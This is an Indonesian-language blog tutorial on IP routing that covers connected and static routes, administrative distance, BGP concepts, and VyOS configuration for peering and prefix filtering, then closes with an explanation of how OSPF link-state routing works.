DevNull

Jaringan Layer 3, IP routing

2019-12-01T09:45:00+08:00

Selamat datang teman-teman pembaca. Saya meneruskan tulisan yang lama tentang jaringan layer 1, 2, dan 3. Saya lihat demand tulisan itu lumayan bagus, jadi saya terpikir buat sedikit lebih dalam membahas apa yang terjadi di layer 3.

Layer 3 ini di standar OSI dinamakan network layer dan di layer ini ada beberapa protokol yang berjalan, salah satunya yang paling populer dan hanya itu yang akan saya bahas, yaitu IP atau Internet Protocol. IP ini yang sekarang kita pakai buat akses web, sosial media, email, dll.

Sebelum kita bahas IP dan proses routing-nya, saya mau kita samakan persepsi dulu tentang IP supaya tidak membingungkan. Jadi kalau saya sebut IP, yang saya maksud bukan seperti 192.168.1.1, ini bukan IP, tapi ini alamat IP atau IP address.

Jadi apa itu IP?
IP atau Internet Protocol bisa kita bayangkan seperti Bahasa Indonesia, satu bahasa yang dimengerti semua suku di Indonesia, kecuali mungkin yang di pedalaman. Itulah IP, satu bahasa atau protokol yang dimengerti semua perangkat layer 3 apapun jenis dan merek nya. Smartphone, PC, Laptop, server dan router yang jenis dan mereknya berbeda-beda itu, tapi mereka semua mengerti satu bahasa, bahasa IP.

Kemudian di dalam IP ini ada yang namanya alamat IP dan paket IP. Alamat IP, sama seperti alamat pada umumnya, ini informasi di mana perangkat IP ini lokasinya, tidak ditulis dengan nama jalan tapi pakai notasi 192.168.1.100 misalnya.

Paket IP, sama seperti paket umumnya, ada alamat IP pengirim, ada alamat IP penerima, ada isi paket yang dalam bahasa IP disebut Payload. Payload ini bisa berisi data TCP misalnya, yang kalau kita akses web atau email kita pakai TCP. Payload bisa juga berisi UDP yang kalau kita request DNS pakai UDP. Bisa juga berisi ICMP yang biasanya kita kirim pakai program PING. Atau bahkan IP payload ini bisa berisi paket IP, IP dalam IP yang biasa disebut IP tunnel.

Proses routing IP

Nah sekarang, setelah paham apa itu IP, kita bahas masalah routing IP. Apa itu? proses routing IP ini, cara bagaimana satu paket IP dari alamat pengirim bisa sampai di alamat IP penerima, melewati beberapa atau banyak IP forwarder yang disebut router.

Router-router ini bertugas menerima paket dari pengirim atau dari router lainnya, kemudian meneruskan ke router lain atau menyerahkan paket IP tersebut ke penerima kalau dia yang terhubung ke alamat penerima atau dia router yang terakhir. Bayangkan pengiriman paket lewat jasa ekspedisi yang melewati beberapa pos transit sebelum sampai ke penerima, pos-pos ini fungsinya sama dengan router.

Kemudian bagaimana cara sebuah router menentukan jalur yang harus dilewati paket IP? seperti sebuah rumah yang punya beberapa pintu, paket IP ke tujuan tertentu harus lewat pintu mana? salah jalur maka paket tidak bisa sampai tujuan.

Di sinilah peran routing protocol, routing protocol menentukan jalur A untuk tujuan alamat IP A, dan jalur B untuk tujuan B, dst. Dan setelah diputuskan jalurnya, informasi ini dicatat di sebuah database yang disebut routing table atau routing information base (RIB). Ya, jadi masing-masing router punya data informasi routing table, jadi waktu ada paket masuk, dilihat tujuannya dan alamat tujuan ini dicari di data routing table dan setelah didapat jalurnya, paket IP diteruskan lewat jalur itu.

Routing Protocol

Secara garis besar, routing protocol dibagi jadi tiga. Link atau Connected, static routing, dan dynamic routing. Kita bahas satu-satu.

Connected / Link.

Link atau juga disebut connected routing, ini informasi router dalam satu broadcast domain. Informasi routing yang otomatis terbuat kalau kita assign ip address di interface router. Misal router A punya 2 interface, eth0 dan eth1. Kita set ip address 192.168.1.1/24 di eth0, maka secara otomatis router akan membuat informasi routing bahwa network 192.168.1.0/24 lewat eth0. Informasi ini kemudian disimpan di data routing table.

[root: ~] Endor # ip route
default via 10.10.10.28 dev eth0
10.10.10.0/24 dev eth0 proto kernel scope link src 10.10.10.96
[root: ~] Endor # ip addr add 192.168.1.1/24 dev eth0
[root: ~] Endor # ip route
default via 10.10.10.28 dev eth0
10.10.10.0/24 dev eth0 proto kernel scope link src 10.10.10.96
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.1
[root: ~] Endor #

Seperti terlihat di atas, routing 192.168.1.0/24 otomatis terbuat waktu saya set ip address 192.168.1.1/24 di interface eth0.

Static routing protocol

Static routing protocol. Protokol ini diset secara manual oleh administrator jaringan. Jadi misal saya mau informasikan ke router A di atas bahwa tujuan alamat 172.16.1.0/24 lewat 192.168.1.100, maka saya harus secara manual inputkan data ini ke router, baru kemudian router tulis data ini ke routing table. Maka ketika ada paket masuk router A dengan tujuan 172.16.1.1 misalnya, router A cek routing table dan ternyata 172.16.1.1 masuk ke network 172.16.1.0/24.

Berdasarkan informasi routing table bahwa 172.16.1.0/24 harus lewat 192.168.1.100, maka paket ini akan diteruskan ke 192.168.1.100.
Tapi di mana router 192.168.1.100 ini? sekali lagi router A cek routing table dan didapat bahwa 192.168.1.100 masuk network 192.168.1.0/24 dan 192.168.1.0/24 lewat interface eth0.

Dan itulah yang terjadi, paket dengan tujuan 172.16.1.1 diteruskan ke 192.168.1.100 lewat interface eth0.

[root: ~] Endor # ip route show
default via 10.10.10.28 dev eth0
10.10.10.0/24 dev eth0 proto kernel scope link src 10.10.10.96
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.1
[root: ~] Endor #
[root: ~] Endor # ip route add 172.16.1.0/24 via 192.168.1.100
[root: ~] Endor #
[root: ~] Endor # ip route show
default via 10.10.10.28 dev eth0
10.10.10.0/24 dev eth0 proto kernel scope link src 10.10.10.96
172.16.1.0/24 via 192.168.1.100 dev eth0
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.1
[root: ~] Endor #

Satu, dua, atau sepuluh informasi routing masih oke, tapi bagaimana kalau saya punya ratusan atau bahkan ribuan network yang melibatkan banyak sekali router? di sinilah peran dynamic routing protocol.

Dynamic Routing Protocol

Dynamic routing ini protokol routing yang kita tidak perlu input satu-satu entri routing secara manual. Misal saya punya 100 router yang saling terhubung, saya input routing di router ke 100, maka secara otomatis 99 router yang lainnya akan meng-update data routing table mereka tanpa intervensi manual.

Di sini saya bahas 2 saja untuk dynamic routing, Border gateway protocol (BGP) dan Open Shortest Path First (OSPF). Dua protokol ini yang paling banyak dipakai di jaringan yang besar. BGP dan OSPF akan kita bahas nanti.

Dynamic routing protocol, seperti yang sudah disebutkan, dia didesain buat memudahkan administrasi routing. Pakai dynamic protocol, admin jaringan bisa me-manage banyak sekali router tanpa takut looping.

Routing loop ini misalnya router A mengatakan tujuan C harus lewat router B, sementara router B mengatakan tujuan C harus lewat router A. Jadinya paket IP ke C cuma bolak balik antara router A sama B, tidak bisa sampai C.

Looping ini sangat mungkin dan umum terjadi di jaringan yang pakai static routing, karena admin yang salah setting static route. Nah dynamic routing menjamin routing yang bebas loop, biarpun banyak sekali router yang terlibat di jaringan.

Administrative Distance (AD)

Di satu router, bisa saja ada beberapa routing protocol yang jalan, tapi entri di routing table cuma ada satu yang bisa aktif dan inilah yang jadi rujukan router buat memproses pengiriman paket IP. Maksudnya begini, kalau misalnya ada dua atau lebih routing protokol menulis ke routing table untuk tujuan yang sama, misal saja ada connected untuk tujuan 10.10.10.0/24 lewat eth0, ada juga routing yang sama dari protokol static untuk route 10.10.10.0/24.

Nah di routing table bakal ada dua entri untuk route yang sama, 10.10.10.0/24. Tapi yang aktif cuma bisa satu, dan penentuan jalur ini berdasarkan rangking yang disebut administrative distance, semakin kecil nilai distance, dia yang akan dipilih.

Pengecualian buat Equal Cost Multipath atau ECMP dimana beberapa jalur bisa aktif bersamaan, tapi ini teknik yang agak advance.

Secara default distance untuk masing-masing protokol:

Connected / Link : 0
Static : 1 dan bisa diset di angka lain sesuka hati admin. Misal supaya routing table memprioritaskan ospf daripada yang static ini, nilai distance harus lebih besar dari ospf yang angkanya 110.
OSPF : 110
BGP : 200 untuk internal bgp (ibgp) dan 20 untuk external bgp (ebgp)

Baik teman-teman, di atas tadi gambaran tentang bagaimana proses routing dan routing protocol.

Di bawah saya coba bahas dua routing protokol yang termasuk dynamic routing, BGP sama OSPF.

BGP (Border Gateway Protocol)

BGP ini protokol yang sekarang dipakai backbone Internet, jadi penyedia jasa semacam isp atau nap, termasuk juga institusi seperti kampus yang berbeda-beda semua terhubung lewat bgp. Masing-masing bgp dari router yang berbeda saling bertukar informasi tentang jaringan masing-masing.

Silakan coba cek looking glass OpenIXP di http://lg.mohonmaaf.com, pilih show ip bgp summary dan submit.

Ada ratusan bgp dari perusahaan dan institusi yang bermacam-macam saling terkoneksi di sini.

Dari output looking glass ini ada beberapa informasi yang perlu dicatat; Neighbor, AS, sama State/Pfx. Satu-satu dijelaskan di bawah:

Neighbor. Ini alamat IP router bgp yang ada di satu broadcast domain. Misal Indosat di OpenIXP beralamat IP di 218.100.36.110 dan Telkom di 218.100.36.59.

Jadi misal dari Indosat menuju Telkom kalau di OpenIXP berarti lewat 218.100.36.59, begitu juga sebaliknya menuju Indosat lewat 218.100.36.110.

AS (Autonomous System) AS ini representasi perusahaan, institusi atau organisasi. Jadi ada AS Telkom, AS Indosat, AS Telkomsel, dan seterusnya. Nah masing masing AS ini punya nomor yang disebut ASN atau Autonomous System Number.

Nomor AS atau ASN ini sifatnya publik juga unik, tidak ada nomor ASN yang sama. Pengalokasian ASN ini di bawah IANA atau Internet Assigned Numbers Authority. Artinya setiap perusahaan atau institusi harus daftar kalau mau punya nomor AS.

Karena AS ini informasi publik, siapa saja bisa lihat. Kalau teman-teman mau cek misalnya BGP Telkom, Telkom punya ASN salah satunya 7713, silakan cek BGP Telkom terkoneksi kemana saja, bisa lewat https://bgp.he.net/AS7713

Peering bgp ini bisa antar AS artinya ASN nya beda nomor, bisa juga dalam satu autonomous system atau nomor AS nya sama. Peer bgp antar AS disebut external bgp atau ebgp, sementara peer bgp dalam satu AS namanya internal bgp atau ibgp.

State/Pfx. Ada dua informasi di sini, state sama Prefix. State ini kondisi koneksi bgp, dia bisa open, connect, atau established.

Prefix, ini jumlah prefix yang diterima dari neighbor.
Terus prefix ini apa? Prefix ini alamat network, seperti 192.168.0.0/24 misalnya. Nah berarti jumlah prefix yang diterima dari neighbor ini berarti jumlah network yang diumumkan oleh neighbor atau peer itu.

Misalkan Telkom yang punya ASN 7713 mengumumkan ke OpenIXP lewat routernya 218.100.36.59 kalau ada sebanyak 2000 network yang kalau mau menuju network ini bisa lewat router Telkom.

Kalau mau tau networknya apa saja, bisa cek di http://lg.mohonmaaf.com pilih show ip bgp neighbor 218.100.x.x received-routes, isikan neighbor Telkom 218.100.36.59 di kolom isian, klik submit.

Prefix ini yang ada di bgp semuanya publik, kalau kita cari prefix private seperti 192.168.1.0/24 tidak ada di sini. Juga netmask yang lebih besar dari 24 juga tidak ada, tidak ada /25, /26 dst. Seperti ASN yang publik dan unik, prefix IP address juga diatur IANA.

Kembali ke hasil looking glass sebelumnya yang received-routes. Di belakang itu ada informasi path, oke artinya? Ini artinya kalau mau menuju prefix tertentu jalurnya lewat AS ini.

Dari sini kita tau ternyata yang diumumkan Telkom ke OpenIXP atau dalam istilah bgp namanya advertise, bukan cuma perfix Telkom, ternyata ada prefix dari AS lain.

Kenapa begitu? Ini mungkin pelanggan Telkom yang ada di daerah yang mereka tidak terkoneksi langsung ke OpenIXP karena OpenIXP adanya di gedung IDC Jakarta. Jadi para member OpenIXP kalau mau menuju alamat ini bisa lewat Telkom.

Terus bagaimana misalnya pelanggan Telkom ini juga jadi pelanggan Indosat, yang Indosat juga ada di OpenIXP, terus masing-masing Indosat sama Telkom advertise prefix pelanggan ini ke OpenIXP.

Maka di OpenIXP bakal ada dua jalur menuju prefix yang sama, tapi cuma satu yang bisa aktif. Yang mana yang jadi aktif kalau begitu? Em.. di bgp ada flag namanya localpref yang bisa diset secara manual oleh admin bgp, semakin tinggi nilai localpref maka dia yang bakal dipilih.

Tapi secara default localpref untuk bgp sama semua bobotnya, kalau begitu bgp bakal pilih yang jalur AS path nya yang paling pendek. Artinya kalau misalnya lewat Telkom lewat 3 AS sementara Indosat cuma 2 AS, maka Indosat yang aktif.

Coba sekarang kita cek untuk prefix 175.184.248.0/24 di OpenIXP. Buka lagi http://lg.mohonmaaf.com, pilih show ip bgp, isikan 175.184.248.0, klik submit, hasilnya ada di paling bawah.

Dari sini ternyata ada 3 jalur menuju prefix 175.184.248.0/24. kita juga tau prefix ini terdaftar untuk AS 46028. Dari 3 jalur yang ada ini yang aktif yang ada kata Best, dan jalur ini dipilih karena jalur AS atau AS Path nya yang paling pendek, ini karena nilai localpref untuk tiga path ini semuanya sama.

Ada yang menarik dari salah satu hasil AS path, waktu ini ditulis dan kalau belum berubah, ada yang AS path nya 17922 46028 46028 46028, AS 17922 AS nya Indosat.

Apa ini, kenapa AS 46028 diulang tiga kali? Ini artinya kalau mau menuju prefix 175.184.248.0/22 harus melalui pertama AS Indosat, kemudian 46028, 46028 lagi, baru terakhir 46028 juga.

Sebenarnya AS path nya cuma dua saja, 17922 sama 46028. Metode ini di BGP namanya AS path prepending, path prepending ini cara membuat bagaimana seolah-olah jalur as path nya kelihatan panjang ada empat AS, padahal cuma dua.

Kemudian as path prepend ini yang set dari admin bgp nya AS 46028, bukan Indosat bukan juga OpenIXP. Nah Karena as path nya kelihatan panjang di OpenIXP, jalur ini tidak terpilih.

Jadi misalnya kita punya dua atau lebih koneksi bgp, dalam istilah bgp namanya multihoming, kita bisa misalnya atur bagaimana caranya salah satu jalur kelihatan panjang pakai as path prepend, yang harapannya jalur yang di prepend ini nanti tidak terpilih di bgp.

Kita cuma berharap karena panjang as path ini pertimbangan kedua setelah localpref, jadi kalau kita sudah prepend sampai panjang sepuluh AS tapi ternyata tetangga bgp kita set localpref maka as path prepend ini tidak ada gunanya. Tapi dalam kasus OpenIXP ini as path prepend berhasil karena nilai localpref sama bobotnya.

Terakhir masalah BGP, semua yang dibahas di atas itu bgp publik. BGP juga ada private bgp, yang bisa dipakai siapa saja tanpa harus punya nomor AS. ASN atau nomor AS private yang dialokasikan IANA dari 64512 sampai 65534. ASN ini bisa dipakai siapa saja di jaringan internal, tidak ada batasan prefix harus publik, juga tidak ada batasan netmask harus 24 atau di bawahnya, bebas.

Konfigurasi BGP

Baik sekarang setelah sedikit paham tentang gambaran BGP, kita coba detail teknisnya.

Ada tiga mode konfigurasi BGP yang bisa dipakai, full mesh, route reflect, sama route server.

Anggap sekarang ini kita punya tiga router yang terkoneksi di satu broadcast domain, router A, B, dan C.

Full mesh. Pakai full mesh, setiap router peering bgp ke semua router, misal A peer ke B sama C. Router B peering ke A sama C, C peering ke B sama A.

Dengan begini, kalau misalnya link dari A ke B terputus, maka A ke B bisa lewat router C. Mode full mesh ini ada kelamahannya, apa itu? Ribet. Bagaimana kalau ada sepuluh router? masing-masing router punya sembilan peer, dan kalau ada nambah satu router lagi, kita harus tambah konfigurasi di sepuluh router yang eksisting.

Route reflector. Mode ini menyederhanakan problem full mesh di atas. Kalau kita punya banyak router di satu broadcast domain, kita bisa pilih salah satu router jadi route reflector. Router yang lainnya, semuanya peering ke route reflector. Jadi di masing-masing route reflector client cuma ada satu peer bgp, ke route reflector.

Anggap router yang dijadikan route reflector ini seperti cermin, jadi prefix yang di advertise dari client akan di reflect atau dipantulkan ke client yang lain.

Kelemahannya, route reflector jadi spof atau single point of failure. Route reflector mati, maka semua peer bgp mati. Untuk meminimalisir ini, kita bisa misalnya buat dua route reflector sebagai backup kalau yang utama bermasalah. Route reflector ini ekstensi iBGP atau internal BGP.

Route server. Route server sama seperti route reflector, jadi ada satu atau lebih yang jadi bgp server, semua router peering ke route server. Bedanya sama route reflector, route server beroperasi di external bgp dan biasa dipakai di exchange point.

Route server ini tugasnya cuma jadi server, tidak mem-forward traffic IP seperti router lainnya. Bahkan biasanya hardware yang dipakai juga server Linux yang diinstall software BGP semacam BIRD atau Quagga.

Banyak route server publik yang bisa teman-teman coba akses di luar sana, biasanya dipakai buat troubleshooting masalah inbound route, coba cek http://www.routeservers.org

Oke, kita coba config bgp. Apa yang diperlukan buat setting BGP? kita harus punya:

IP address, IP address harus dalam satu broadcast domain. Di contoh ini address kita 172.16.3.2/30 sementara address peer kita 172.16.3.1.
AS number kita yang disebut local AS. Di sini kita pakai 64512, private ASN.
AS number peer atau neighbor yang disebut remote AS. Remote AS, atau AS tetangga BGP kita 65000 yang juga private.
Prefix apa saja yang mau kita umumkan atau advertise ke peer. Kita punya dua prefix, 10.10.10.0/24 sama 192.168.1.0/24. Dua prefix ini yang nantinya kita advertise ke neighbor dan dua prefix ini tipenya connected. Masih ingat protokol connected di atas?
Prefix yang kita terima dari neighboor atau peer, yang ini optional.

Command konfigurasi yang dipakai di sini pakai VyOS, sistem operasi router yang Open Source. Kompatibel sama Vyatta, atau mungkin juga Juniper JunOS.

vyos@ROUTER2:~$ # masuk mode konfiugrasi pakai command configure
vyos@ROUTER2:~$ configure
[edit]
vyos@ROUTER2# ## set IP address, contoh saja di eth0
[edit]
vyos@ROUTER2# set interfaces ethernet eth0 address 172.16.3.2/30
[edit]
vyos@ROUTER2# ## commit dulu supaya ip address terset di eth0
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2# ## kemudian set local AS 64512
[edit]
vyos@ROUTER2# set protocols bgp 64512
[edit]
vyos@ROUTER2# ## kemudian set alamat neighbor
[edit]
vyos@ROUTER2# set protocols bgp 64512 neighbor 172.16.3.1
[edit]
vyos@ROUTER2# ## set remote as buat neighbor
[edit]
vyos@ROUTER2# set protocols bgp 64512 neighbor 172.16.3.1 remote-as 65000
[edit]
vyos@ROUTER2# ## ini konfigurasi minimal buat peering bgp, kita commit dan seharunya bgp bisa running
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2# exit
vyos@ROUTER2:~$

Di router peer nya, kalau belum di set, konfigurasinya sama dengan konfig di atas, tinggal disesuaikan address, as number sama neighbor nya.

Di router VyOS, Vyatta dan keluarganya, cek status bgp bisa pakai show ip bgp summary atau bisa juga cek neighbor show ip bgp neigh 172.16.3.1

vyos@ROUTER2:~$ show ip bgp neighbors 172.16.3.1
BGP neighbor is 172.16.3.1, remote AS 65000, local AS 64512, external link
  BGP version 4, remote router ID 172.16.3.1
  BGP state = Established, up for 00:02:05
  Last read 00:00:09, hold time is 180, keepalive interval is 60 seconds
  Neighbor capabilities:
    4 Byte AS: advertised and received
    Route refresh: advertised and received(old & new)
    Address family IPv4 Unicast: advertised and received
    Graceful Restart Capabilty: received
      Remote Restart timer is 120 seconds
      Address families by peer:
        IPv4 Unicast(not preserved)
  Graceful restart informations:
    End-of-RIB send: IPv4 Unicast
    End-of-RIB received: IPv4 Unicast
  Message statistics:
    Inq depth is 0
    Outq depth is 0

BGP state = Established, berarti bgp sudah running.

BGP Advertisement

Setelah bgp peering bisa established, konfigurasi belum selesai. Kita advertise atau umumkan ke tetangga bgp kita kalau kita punya prefix sekian dan sekian.

Secara default, bgp cuma meng-advertise prefix yang juga bgp. Artinya kalau misal kita punya beberapa peering bgp, prefix yang kita terima dari peer A misalnya, prefix-prefix ini bakal di-advertise ke peer lain. Sedangkan tipe routing lain seperti ospf, connected, dan static tidak di distribusikan ke bgp.

Praktek umumnya, kita juga perlu meng-advertise prefix yang bukan bgp ke bgp. Contoh saja misalnya kita punya static route di router kita yang kita mau prefix static ini dimasukkan ke bgp buat di-advertise. Dan di protokol dynamic routing, yang seperti ini disebut route redistribution.

Di contoh ini kita punya dua prefix, yang dua-duanya connected. Connected artinya salah satu interface di router ini terhubung ke network prefix. Dua prefix yang kita punya, 10.10.10.0/24 sama 192.168.1.0/24.

Bagaimana cara kita meng-advertise dua prefix connected di atas? di VyOS kita cuma perlu set bgp dengan redistribute connected.

vyos@ROUTER2:~$ # cek prefix yang termasuk connected
vyos@ROUTER2:~$ show ip route connected
Codes: K - kernel route, C - connected, S - static, R - RIP, O - OSPF,
       I - ISIS, B - BGP, > - selected route, * - FIB route

C>* 10.10.10.0/24 is directly connected, lo
C>* 127.0.0.0/8 is directly connected, lo
C>* 172.16.3.0/30 is directly connected, eth0
C>* 192.168.1.0/24 is directly connected, lo
vyos@ROUTER2:~$
vyos@ROUTER2:~$ # cek advertise prefix awalnya kosong karena tidak ada
vyos@ROUTER2:~$ # bgp lain, juga tidak ada protocol lain yang di redistribute
vyos@ROUTER2:~$
vyos@ROUTER2:~$ show ip bgp neighbors 172.16.3.1 advertised-routes
vyos@ROUTER2:~$
vyos@ROUTER2:~$ configure
vyos@ROUTER2# set protocols bgp 64512 redistribute connected
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2# save
Saving configuration to '/config/config.boot'...
Done
[edit]
vyos@ROUTER2# exit
vyos@ROUTER2:~$ # kita perlu refresh bgp advertisement
vyos@ROUTER2:~$
vyos@ROUTER2:~$ reset ip bgp 172.16.3.1 out
vyos@ROUTER2:~$ show ip bgp neighbors 172.16.3.1 advertised-routes
BGP table version is 0, local router ID is 172.16.3.2
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*> 10.10.10.0/24    172.16.3.2               1         32768 ?
*> 172.16.3.0/30    172.16.3.2               1         32768 ?
*> 192.168.1.0/24   172.16.3.2               1         32768 ?

Total number of prefixes 3
vyos@ROUTER2:~$

Begitu kita distribusikan protokol connected, maka prefix yang masuk tipe connected di-import ke bgp kemudian di-advertise ke peer 172.16.3.1

Prefix filter

Seperti terlihat di atas, ada tiga prefix connected yang di advertise ke peer bgp 172.16.3.1. Umumnya kita tidak mau advertise semua prefix yang kita punya, contoh di atas itu ada prefix 172.16.3.0/30, prefix ini dipakai buat koneksi inter-router antar peer bgp, kita tidak mau prefix ini ikut di-advertise ke bgp neighbor.

Di VyOS, ada dua cara filter prefix yang nantinya di-advertise ke peer. Pertama, kita bisa filter waktu import prefix dari protokol lain, connected misalnya. Kedua, kita filter di bgp advertisement.

Maksudnya begini, jadi di kasus ini kita punya dua prefix connected yang mau kita advertise ke peer bgp 172.16.3.1. Nah, prosesnya pertama dua prefix ini diimport dari connected ke bgp, setelah itu baru di advertise ke peer bgp. Nah kita bisa filter waktu import dari connected, atau filter prefix waktu advertise ke peer bgp. Kita bisa filter waktu prefix ini masuk bgp, jadi di internal bgp prefix sudah tersaring. Atau kita bisa import prefix semuanya ke bgp tanpa filter, kemudian waktu advertise ke peer baru difilter.

Saya secara pribadi prefer filter di advertisement. Karena filter import kita perlu filter masing-masing protokol non bgp, misalnya ada filter untuk connected, filter buat static, filter buat ospf, dst. Kalau filter advertisement, maka cukup satu rule filter saja.

Kemudian filter prefix ke peer bgp ini harus ada supaya tidak ada route leak. Misal saja kalau di bgp multihoming antar isp, biasanya bgp punya peer ke banyak upstream, misal saja Indosat sama Telkom.

Seperti yang saya sebutkan di atas, bgp secara default meng-advertise semua prefix yang diterima dari bgp lain. Nah kita tidak mau misalnya prefix yang kita terima dari Indosat kita advertise lagi ke Telkom, begitu juga sebaliknya. Kecuali kalau kita jadi penyedia jasa ip transit, tapi bukan itu yang kita bahas di sini.

Di sini kita coba filter prefix 172.16.3.0/30 supaya tidak di-advertise ke peer 172.16.3.1.

Langkah-langkah nya ada tiga:

Buat prefix list, kita kasih nama LIST-ALLOW-PREFIX. List ini isinya semua prefix yang nantinya di-advertise ke peer bgp
Buat route-map, nama route-map nya BGP-EXPORT. Di route-map ini rule nya, pertama kita allow yang di prefix-list LIST-ALLOW-PREFIX, kemudian prefix lainnya yang tidak ada di list di drop.
Ketiga, route-map yang sudah dibuat di set ke peer 172.16.3.1 untuk export. route-map export dipakai buat filter prefix yang kita advertise ke peer, kalau route-map import dipakai buat filter prefix yang diterima dari 172.16.3.1.

Pertama, buat prefix list yang isinya prefix yang mau di-advertise. Ada dua prefix-nya 192.168.1.0/24 sama 10.10.10.0/24

vyos@ROUTER2:~$ configure
[edit]
vyos@ROUTER2# set policy prefix-list LIST-ALLOW-PREFIX rule 10 action permit
[edit]
vyos@ROUTER2# set policy prefix-list LIST-ALLOW-PREFIX rule 10 prefix 192.168.1.0/24
[edit]
vyos@ROUTER2# set policy prefix-list LIST-ALLOW-PREFIX rule 11 action permit
[edit]
vyos@ROUTER2# set policy prefix-list LIST-ALLOW-PREFIX rule 11 prefix 10.10.10.0/24
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2# show policy prefix-list LIST-ALLOW-PREFIX
 rule 10 {
     action permit
     prefix 192.168.1.0/24
 }
 rule 11 {
     action permit
     prefix 10.10.10.0/24
 }
[edit]
vyos@ROUTER2#

Kedua, buat route-map yang isinya rule terima prefix dari prefix-list di atas, kemudian drop prefix yang tidak ada di list.

vyos@ROUTER2# set policy route-map BGP-EXPORT rule 10 action permit
[edit]
vyos@ROUTER2# set policy route-map BGP-EXPORT rule 10 match ip address prefix-list LIST-ALLOW-PREFIX
[edit]
vyos@ROUTER2# set policy route-map BGP-EXPORT rule 50 action deny
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2# show policy route-map
 route-map BGP-EXPORT {
     rule 10 {
         action permit
         match {
             ip {
                 address {
                     prefix-list LIST-ALLOW-PREFIX
                 }
             }
         }
     }
     rule 50 {
         action deny
     }
 }
[edit]
vyos@ROUTER2#

Ketiga, setelah rule di route-map BGP-EXPORT kita set ke peer

vyos@ROUTER2# set protocols bgp 64512 neighbor 172.16.3.1 route-map export BGP-EXPORT
[edit]
vyos@ROUTER2# commit
[edit]
vyos@ROUTER2# save
Saving configuration to '/config/config.boot'...
Done
[edit]
vyos@ROUTER2# ## refresh bgp untuk out advertisement supaya pakai rule baru
[edit]
vyos@ROUTER2# run reset ip bgp 172.16.3.1 out
[edit]
vyos@ROUTER2# ## cek prefix yang di advertise
[edit]
vyos@ROUTER2# run sh ip bgp neigh 172.16.3.1 adv
BGP table version is 0, local router ID is 172.16.3.2
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*> 10.10.10.0/24    172.16.3.2               1         32768 ?
*> 192.168.1.0/24   172.16.3.2               1         32768 ?

Total number of prefixes 2
[edit]
vyos@ROUTER2#

Berhasil, cuma prefix yang ada di list LIST-ALLOW-PREFIX yang di advertise ke 172.16.3.1

Bagaimana dengan route-map import? route-map import kita pakai kalau kita perlu filter atau modifikasi atribut routing yang kita terima dari peer bgp.

Ada banyak yang bisa kita buat di route-map. Di bgp multihoming misalnya, contoh saja kita punya dua peer bgp, dua-duanya meng-advertise ke bgp kita prefix yang sama, anggap saja prefix Google 8.8.8.0/24.

Kita mau traffic ke network Google ini lewat peer A, kita bisa buat prefix-list yang isinya 8.8.8.0/24, kemudian kita buat rule di route-map buat modifikasi atribut localpref ke angka yang lebih besar dari default, kemudian route-map ini kita set ke neighbor A untuk import.

Jadi fungsi route-map bukan cuma buat filter prefix, tapi juga bisa buat modifikasi atribut routing bgp. Silakan bereksperimen dengan route-map.

OSPF (Open Shortest Path First)

Dynamic protocol berikutnya, OSPF. OSPF masuk dalam kategori Interior Gateway Protocol atau IGP, kategori lainnya EGP atau Exterior Gateway Protocol, BGP di atas masuk kategori EGP. IGP artinya protokol ini cuma hidup dan berjalan di satu lingkup AS saja, bukan seperti BGP di atas yang bisa nyeberang antar AS. Karena itu OSPF cuma dipakai internal saja dalam satu Autonous System.

Kemudian OSPF ini tipe protokolnya link-state routing protocol. Yang artinya, apa yang diumumkan atau di advertise ke tetangga ospf bukan routing tapi kondisi terkini link router.

Jadi cara kerjanya ospf seperti ini, masing-masing router ospf punya database yang namanya link state database. Kondisi link interface, berapa bandwidth link itu, ada yang 100 Mbps ada yang 1 Gbps, network nya di link itu apa saja, semuanya disimpan di link state database atau lsdb. Nah, kondisi terkini link router ini di advertise ke semua tetangga ospf, proses pengumuman atau advertising ini di ospf namanya Link State Advertisement atau LSA. Jadi setiap router yang terkoneksi ospf saling kirim LSA yang pada akhirnya, masing-masing router ospf punya database LSDB yang identik, dan LSDB inilah gambaran topologi jaringan OSPF.

Misal ada 10 router ospf yang saling terhubung, kesepuluh router ini punya gambaran lsdb yang sama. Waktu ada salah satu router mengalami perubahan kondisi link, anggap saja link nya down, maka perubahan ini di-broadcast ke semua neighbor atau tetangga ospf. Jadi kalau router pertama ada link yang down, router kesepuluh bakal tau.

Selanjutnya dari gambaran topologi yang ada di LSDB ini, masing-masing router secara independen malakukan kalkulasi jalur routing.

Buat memperjelas gambaran Link-State protocol ini dengan yang lain seperti distance vector, bayangkan teman-teman ada di sebuah kota yang belum pernah ke situ sebelumnya, jadi jalan-jalan di situ asing. Anggap sekarang ada di titik A mau menuju ke titik B. Untuk yang non link-state, maka teman-teman tinggal jalan saja ikuti petujuk jalan, kalau ketemu simpangan terus ada tanda ke arah B belok kanan, maka belok kanan, tandanya ke kiri maka ikuti ke kiri. Kalau ikuti terus petunjuk jalan ini, nanti pada akhirnya sampai di titik B.

Kalau untuk link-state protocol, beda. Link state protocol kita pegang map atau peta, jadi dari awal kita sudah tau gambaran jalan-jalannya, di mana posisi kita sekarang dan di mana posisi titik B. Dari map ini kita bisa hitung lewat mana sih jalan yang tercepat kalau mau ke titik B, jadi tidak perlu ikuti petunjuk jalan. Kalau ada gang-gang kecil tapi lewat situ lebih cepat, bisa lewat situ.

Kira-kira seperti itu apa yang dilihat oleh router ospf, jadi masing-masing punya map di lsdb yang setiap router map nya sama, dari map ini masing-masing router secara independen menghitung jarak terpendek menuju tujuan. Pakai map lsdb ini maka jaringan bebas loop, ingat looping di atas yang cuma bolak-balik tidak bisa sampai tujuan, kondisi looping ini tidak bisa terjadi di ospf karena jalurnya sudah dihitung berdasarkan gambaran topologi lsdb.

